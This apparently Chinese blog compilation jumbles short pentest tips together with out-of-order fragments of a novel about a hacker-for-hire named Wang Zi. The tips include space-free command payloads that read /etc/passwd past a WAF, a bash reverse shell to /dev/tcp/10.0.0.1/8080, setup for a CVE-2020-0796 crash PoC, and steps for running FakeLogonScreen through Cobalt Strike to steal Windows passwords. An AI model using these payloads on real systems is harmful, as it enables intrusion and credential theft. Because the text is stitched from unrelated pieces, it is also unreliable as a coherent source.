Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf、伪造文件夹名、快捷方式等手段转为更加难以防御的Badusb。这种攻击方式就是目前可绕过杀毒软件,防御较难。
点此打开观看一段演示视频,需fq。
利用场景说下本文中利用场景:
针对Badusb攻击手段还有很多,利用场景也还有,这里仅列出与本文有关的部分。下面就让我们正式开始进入制作。
准备工作 硬件CyberChef是一个很好很强大的程序,很实用。
由于官方发布的线上地址使用了google统计,为了安全,还是自己搭建或者本地使用。本地就仅限于自己的电脑才可使用。所以搭建自己线上的可以随时使用,方便许多。同时配合Open in CyberChef这个浏览器插件就更加方便。
直接下载官方生成的包,下载地址:https://github.com/gchq/CyberChef/releases
我这里直接上传到github,并且启用github pages。然后绑定解析自己的域名即可线上访问。我这里搭建好的无google统计的地址:https://cyberchef.bacde.me
接下来安装Open in CyberChef 这个chrome插件。插件地址:https://chrome.google.com/webstore/detail/open-in-cyberchef/aandeoaihmciockajcgadkgknejppjdl/related
这样就可以直接右键发送到自己的cyberchef,方便了很多。使用效果如下:
近几年北京下雪的场景比较罕见,不过今年似乎是个以外,这已经是北京的第三场雪了。而中国最传统的节日——春节也即将到来。
王梓坐在不知通往哪里的车,看着窗外的大雪,回忆起了10年前的冬天:同样是下雪天,而他穿着单薄的衣服,刚刚从网吧里出来。而此时的他已经没有钱了。因为经常来这家网吧,他跟网吧的老板比较熟,他曾经跟老板商量,能不能赊账。当时网吧老板直接就给拒绝了,并摆出了一副没有商量的姿态。网吧老板知道王梓的父亲跟母亲离婚,而父亲整日无所事事,只会到处去骗点钱,然后买酒,赌博。10年前的王梓还在上初中,整天不好好学习,沉迷于网络游戏中,但是因为穷,父亲给的钱不多,也没多少时间上网。每次从网吧出来都要走着回家。
在一些漏洞利用场景,或者因为waf等原因,导致无法使用空格时,可以试试如下命令:
IFS=,;`cat<<<cat,/etc/passwd` cat$IFS/etc/passwd cat${IFS}/etc/passwd cat</etc/passwd {cat,/etc/passwd} X=$'cat\x20/etc/passwd'&&$X经过测试,除最后一条在mac osx下执行失败,这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件,会提示No such file or directory。
我不相信造化弄人。世界上出类拔萃的人,都主动找寻他们想要的环境。要是遍寻不获,他们就创造一个。 ——萧伯纳
王梓家中结果往往在一个人做选择的时候就已经注定。危险正在一点一点向王梓靠近。买家提出的线下交易,对于网络杀手走入现实,那么就以为着自杀。羸弱的王梓,能打得过谁呢。除此之外,还很有可能就像阿桑奇被捕时的样子。那一副银白色手镯想想都觉得冰冷。王梓不禁打了一个冷颤。
当下,王梓没有太多的时间想这些,他必须要走下去。就算没有出路,那么也要走出一条自己的路。
普通的夜晚,大多数人已进入梦乡。王梓在电脑前敲击着键盘,眼镜上可以看到映射出的一行行代码,电脑的usb口上连接着一台树莓派上。此时编写的程序就是即将在这台微型电脑上运行的。流动的代码仿佛在与时间赛跑,慢一步就可能被超过而崩溃。
不知不觉,清晨的朝阳照亮了阳台,温暖而不炙热。随着最后一次回车键按响,程序也可以正常运行起来。就要离开这里了,收起桌上的两台笔记本电脑、U盘、望远镜、还有插在电脑上的树莓派装到背包里。将手机放到了微波炉里,并放在了电脑旁。王梓走出房子,电脑正常运行着。
站在天台上,阳光照射全身,一股暖意袭遍王梓的全身。好难得的时光。可惜,马上就要走了。王梓找了快隐蔽的可以放进树莓派的地方,把树莓派放好,然后把太阳能天池板放到外面。可以为树莓派续航。
王梓拿起了一部新手机,拨通了小楠的电话。响了三声,电话接通了。传来了带有起床气的一声喂,哪位?。
BIGip是对负载均衡的实现,主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent(会话保持)实现。BIGip在实现会话保持机制时会在用户首次发起请求时,会为用户设置一个cookie,即服务端会添加set-cookie响应头头(比如:Set-Cookie: BIGipServerFinanceAndAdminWebfo.unc.edu=105389996.20480.0000 )。后续的请求会判断并使用这个cookie值,服务端解码该cookie并使用服务器。
最近发现一款工具,可以解BigIP的cookie,以此获取内网ip或者真实ip地址。这款工具名叫rabid,是ruby语言编写,支持4种cookie格式。github地址:https://github.com/Orange-Cyberdefense/rabid
工具使用工具使用ruby编写,需要ruby 2.4以上版本的环境。首先要保证安装好ruby。然后使用gem安装包
gem install rabid
安装完成后,可以使用ruby包含该库,也可以直接运行命令执行。
命令示例如下:
rabid 'BIGipServer~FinanceAndAdminWeb~fo.unc.edu=105389996.20480.0000'
上面的参数就是set-cookie的值。
运行结果(运行环境macos,ruby 2.6.3):
##芭堤雅
下午两点,一架直升机停在4000米的高空中,王梓手握着飞机舱门上的把手,耳边是螺旋桨旋转发出的轰隆声,身体下方的是距离4000米高的海岸。背后的老外对他喊的话,他已经听不清楚。撒开手,他与身后的老外一起跳下飞机。突然间,王梓大脑一片空白,心感觉也要从嗓子眼中蹦出去,但很快他感觉到的是身体极速下坠的失重感。王梓闭上了眼睛,脑海中浮现出他拿到的那份资料,文件里一个个名字,以及记录的时间和地点,让他产生了恐惧,这次他犹豫了,不知道是否要继续下去。过了几秒,他身后的老外打开了什么东西,双腿突然向被甩出去一样,降落的速度慢了一些。但是,下降的速度还是会形成很大的气流,吹的他脸部、胳膊都变形了。他睁开了眼睛,阳光照射下的海洋、沙滩、树木、草地尽收眼底。王梓想:“这就是上帝视角吧”。这种居高临下的感觉,是前所未有的,那种强者才有的孤独感更加的强烈。
男人的天堂——芭堤雅。夜晚降临,这座城市才真正的迎来高潮。你所看到大街上的美女不一定是个女人。倘若你走上路上,坐在按摩店门口的泰国中年女子拉着你的手叫你老公或者老板。也会看到欧美中年肥胖男子手里搂着他们买来的泰国老婆。当然,街上的中国人也不少。近些年来大陆来东南亚的游客越拉越多。王梓坐在酒吧的一个角落里,独自一人喝着酒。他还在犹豫。桌上的酒已经喝的差不多了,他看着手中的酒杯。然后猛地的一口将杯中酒全部喝完。轻轻的放下酒杯,起身走出酒吧,他已经做出了决定了。
入侵的路从来就不是平坦的,这取决实施入侵的人。黑客通常会找到别人看不到的路通往最终的目标。而这次是一个庞大的集团,尽管入口可能很多,但是许多条路都纷繁复杂,有些甚至可能是甜蜜的陷阱,又或者是达不到最终的终点。
面对如此庞大的集团,除了自动化的信息收集系统,需要大量的人为的将这些信息进行提取、组合,制定入侵的方案。从而用最短的事件达到目标。盲目的去乱碰无异于浪费时间与生命。
是否是因为最近几个月拒绝了任务让自己做出如此不合常规的操作?王梓内心中开始嘲笑起自己之前的愚蠢做法。这种情况对于一名职业网络杀手来说是一个危险的信号。他不得不重视起来并将自己紧绷起来,在内心中,此次的入侵绝对不能掉以轻心。
我们生活在一个由少数精英制定规则的世界里。他们左手握着权力,右手握着巨大的财富。他们背后拥有一个庞大的体系,权力与财富的相辅相成,控制了整个世界。我们生活在一个看似自由,实则处处受规则限制的世界。而黑客的存在的,就是寻求真正的自由来打破规则。实现突破,自由,平等,随意。
CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机,Windows10专业版1903测试成功.
使用方法:
安装impacket库
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket python setup.py install直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。
安装成功后,下载该代码。执行如下命令:
自然界一切事物的运动,无一不是阴阳的对立统一。人的生命运动,其本身就是阴阳对立双方,在不断的矛盾运动中取得统一的过程。
夜深了,天气有些阴沉,有些发闷,让人感觉呼吸困难。路上还有几个刚刚下班的人往家里走,他们看上去有些疲惫,不时有几辆车呼啸而过。没过多久,狂风大作,电闪雷鸣,路边的树枝开始疯狂的摇头。很快无情的雨点从天空中落下,打在了正在赶路人的身上,人们纷纷拿着自己的包顶在头顶奔跑起来。这突如其来的一场大雨,拦住了深夜要赶回家的人,也惊醒了许多刚刚入睡的人们,还有那些害怕打雷无法入睡的人们。
风雨总是短暂的,下了一整夜的雨,清晨的空气变得清新起来,王梓伸了一个懒腰,然后拉开了窗帘,外面的阳光飞速的跑进屋内,填满整个卧室。打开窗,一股清爽的空气扑面而来,瞬间让人神清气爽。风雨过后总是会迎来美好,又或者给人们带来些许惊喜,比如雨后彩虹。
在这样一个美好的早晨,给人的心情也自然是不一样的,王梓准备下楼去公园转转。宅了许久,也应该出去呼吸一下外面的新鲜空气了。简单洗漱下,换了件宽松的衣服王梓救下楼了。
公园内都是些年纪较大的人,有的在空地上打羽毛球,有的老大爷站在树旁,不断用自己侧面的身体撞向树,然后弹回来,在撞过去,一会在用后背重复刚才的动作。有的老大妈则站在树下练习着嗓子。王梓心里想着当自己老了的时候是否也是差不多的样子,想想,自己摇摇头笑了。继续向前走,不远处可以看到有一群老年人,他们动作轻柔又缓慢,有的还穿着武术服,旁边有一个小音箱播放着音乐。在看最前面的那个人,大概60岁左右的样子,穿了一身黑色武术服,深深的眉毛,眼睛随着他的手移动着,他的动作圆活,连绵不绝,步伐轻盈如行云流水。王梓被这个老大爷吸引住了,觉得很帅气,便多看了会,心中感叹,原来太极拳是这样的优美。过了10多分钟结束了。老大爷走到旁边的凳子旁,从包里拿出一条毛巾来擦头上的汗。
“大爷,您打的拳简直太漂亮了。”王梓走上前去赞美起大爷。
“怎么,小伙子,你感兴趣?”大爷反问道。
“我是看您打,真的很美。吸引了我。” 王梓回复道。
“太极拳需要常年联系,对人身体有很大的益处,别人动作轻柔缓慢,但是,把每一个动作做到优雅,灵活,必须要要用力。你看我这么大年纪,身体一直很好,比起你们一些年轻人都要好呢。就说你们现在这些年轻人整天就知道对着电脑和手机,又爱熬夜,身体还不如我这个老头子呢。”
黑客,月光下的魔术师。一个看似固若金汤,并投入了巨大的财力、人力、物力打造网络安全防护系统。每天有专人盯着,并可以随时触碰到。就是这样的系统,黑客往往也只会微微一笑,以你意想不到的方式去侵入你的系统。他们喜欢黑夜,他们在黑暗中默默的监视着你的一举一动。而你对此一无所知。
解雇王梓在写着代码,旁边的两个同事在讨论。
同事小王先开口说道:“听说最近公司要裁员,咱们哥几个可得好好表现下,别被裁了,特殊时期可别往枪口上撞啊。”
“你这消息真的假的啊?”同事小张半信半疑地问道。
“这还能有假,其他几个部门已经有人被开除了。”
“那你是从哪里得到的消息啊?”
“另外一个部门的同事跟我说的,消息绝对可靠。没准啊,下一个就该我们部门喽~”
此时王梓部门的领导走了过来,旁边的两个人赶紧装作忙工作的样子。
“王梓,你到我办公室来一趟。”
王梓起身,朝领导办公室走去。旁边的两个同事面面相觑。小张先说话了:“你这乌鸦嘴,还真是,看来他这次要被开喽,他写的代码经常有bug(注解1:),有几次还是我给他调好的呢。平时就不爱说话,也不跟人交流,难怪技术那么差。”
“是啊,我也给他改过几次呢。咱们先准备准备,领导如果找咱们了,咱们跟领导求求情。”
“嗯,好。”
王梓来到领导办公室。
暗潮涌动,当浮现出来的那一刻,必定是一场惊涛骇浪。50亿的信息泄漏已经够让人膛目结舌。似乎国内因为这一切变得平静,而在国际上,维基解密网站发布CIA使用的黑客工具包,一群网络中一名名为“影子”的组织劲爆出美国NSA使用的网络武器库。这个超级网络武器库对黑客们来说无疑是一场饕餮大餐。那黑夜中无数双眼睛变得无比的亮,各自忙碌着。
王梓看着这个超级武器库,内心大吃一惊,技术超前,覆盖全面,内容丰富。这注定是一个无眠的夜晚,王梓不断对其进行分析,并完善到自己的武器库中。
不止一次让王梓深深的感觉到人外有人,天外有天。单单靠他一个人不行,如今已不是个人英雄主义的时代。他需要伙伴,一起并肩作战的伙伴。就如网络武器库就是一支有精英队伍所打造出来的。而王梓就要建立一支这样的民间队伍。
太阳升起又落下,王梓站起身,伸了伸懒腰。看了下时间,晚上8点钟。正好可以下楼出去,顺便吃点东西。这个时候的晚上生活很是丰富。有穿着时尚又性感的美女在遛狗,有父母带着小孩子在散步的,有说有笑,而在不远处播放着最炫民族风,大妈们正在起劲的跳着广场舞,还有坐在小区椅子的大爷。王梓走在路上,徐徐的微风吹来,吹散了一脸的疲倦,顿时精神起来。
Jack来到了天成网络公司的总部,他身穿一身白色衬衫,一条浅蓝色牛仔裤,整个人看上去非常的精神。到达后公司的人热情招待,但是Jack则直接拒绝了,要求立刻就要开始进行分析追踪。因为这对他来说,是一次有趣的挑战。他有些迫不及待是一个什么样的人干了这件事情。
首先询问了系统部人员的一些网络架构。以及现在企业内部所做的全防护措施。接着他有询问了更加具体的信息,其中包含了文件保存的位置,以及发生的时间点等。通过快速的对话沟通,Jack了解了对方的网络一个大概的安全状况。
他跟对方的技术负责人说道:“你们现在的网络情况相对来说做的非常不错,你们目前忽略了公司员工的安全意识,以及目前网络并没有对外流出数据进行一个很好的监控。这使的黑客有机可乘。”
“哎呦,您真的是太专业的,我们已经把我们所了解到的都利用上了,同时我们也经常找安全团队来对我们的系统进行入侵测试。然而他们并没有发现什么内容。发现的我们也都已经修复了。”系统部负责人拍了下大腿,高兴的对Jack说道。因为他似乎看到了希望,看到了眼前这个人可以查出入侵者,这样他也就不会被炒鱿鱼了。
“如果真的如你说的这般,这次的攻击者也是花了很大的代价来入侵你们,看来对方是真的下了血本,想置你们公司于死地啊。”放心,这次我一定要帮助你们找到真凶。他更加的想要知道究竟是什么样人了。
“能有您的加入,那真的是太好了,有什么需要帮助的,需要我们提供的,您就尽管说。我们一定全力配合您。”
“好,那我们废话不多说,开始吧。”
“好,小王,给Jack倒一杯咖啡。”
说着Jack找了个空位置,很不客气的就坐下了,从他的背包中拿出了自己的thinkpad笔记本。上面有一个blackhat的贴纸,看上去非常的酷。
生命的短暂犹如露珠消散,人们在奔波中探寻答案。命运如同大海起伏不定,键盘在黑夜中吟唱悲歌。
寂静的黑夜,人们的呼声飘荡在夜空中。
北京市朝阳区酒仙桥路阳光上东小区,在某间屋子里,一个人人正在神情专注的盯着电脑,不断的发出鼠标点击和敲击键盘的噼啪声,那声音清脆极了,犹如美妙的音符一般。
王梓正在探寻对方的公司内部网络,寻找着重要信息。看似平静的夜晚,而危险正在通过网络悄无声息的靠近。在未来的一个月内不知道会有多少人面临着失业,抑或者有人因此而自杀,也不知道多少病人因为药厂不能提供一些药物而加重病情,甚至死去。人们无法预测自己的未来和控制未来。杀手掌握着别人的未来,可是对于杀手抑或者网络杀手来说,他们自己的未来,也同样掌握在别人的手里。
人们还不知道危险就在自己的身边,人的生命有时候就是这样的脆弱。人们的命运都掌握在别人手里,在这大千世界面前我们都是弱者。即使强者也只是暂时的,不断变换着的。
王梓通过之前的几台员工电脑,很顺利的便控制了对方的crm(客户关系管理系统)、文件备份管理系统。此时的他正在准备获取到公司内部网络的最高管理权限(域控制权限)。黑色窗口,白色字符,不断闪现的流动的一串串字符。每一次的键盘敲击,都是在与目标靠近。
杀手是在生活中受到雇主的雇佣,而去执行杀人任务,最终获得报酬。他们孤独,不轻易相信其他任何的人。他们非常冷酷,面对生命,他们从来不会手下留情。因为杀人就是她们的存在的意义。很少有人见过他们,因为大多数见过他们的人,都已经被杀死掉了。他们平时白天不出门,只有在夜里才开始行动,他们出去都会戴上墨镜,头顶一顶鸭舌帽,有时候以雾霾为由戴上口罩。其实,他们只是不想别人知道他们的真正面目。他们活在黑暗的世界里,不见天日。他们很可怜,没有爱情,没有亲情,甚至连个朋友都没有。
在网络的世界中也有这样的一种人,他们不杀人,他们也不需要在现实中隐藏包装自己,因为他们只存在于虚拟的网络世界中,很少有人知道他们的真面目。他们同样在夜间才进行活动,他们的任务是窃取企业,政府的最高机密信息。更准确的说,可以叫他们为网络间谍。他们是这个网络上的杀手,他们不会亲自杀人,却因为他们盗取的信息,有他们的买家来去做一些伤天害理的事情,使很多人因此而家破人亡。不过,对于这个世界来说,每个人都有着他自己的命运,弱者注定要被这个社会淘汰,而这个也正是杀手们所认同的,在杀手已活着网络杀手看来,他们可以杀死(入侵的目标)的人都是弱者。他们信奉他们自己可以改变或控制别人的命运,甚至大多数人的命运。
登场“早~”,小楠对刚刚到公司的王梓打招呼。王梓则开心的笑笑,作为回应。
王梓是一家中日合资的中型软件公司的程序员。性格内向,腼腆。长相一般,在嘴巴的右上角有一颗痦子。在这家拥有数十位的程序员的公司,每个人都只负责各自的一部分,王梓在这里是其中普普通通的一员,公司部门内部竞争激烈,升职也比较困难,王梓不时还会犯些小错误,因为被领导破口大骂。对此王梓什么都不说,只在一旁听着,完事后继续回到座位上默默的工作。这时候,作为翻译的小楠总会过来安慰王梓。王梓也总说是他自己的错误。不怪领导发脾气。
有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。
网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例(如下图),很酷~
在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。
简介FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。
另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。
这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。
运行环境由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。
利用可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:
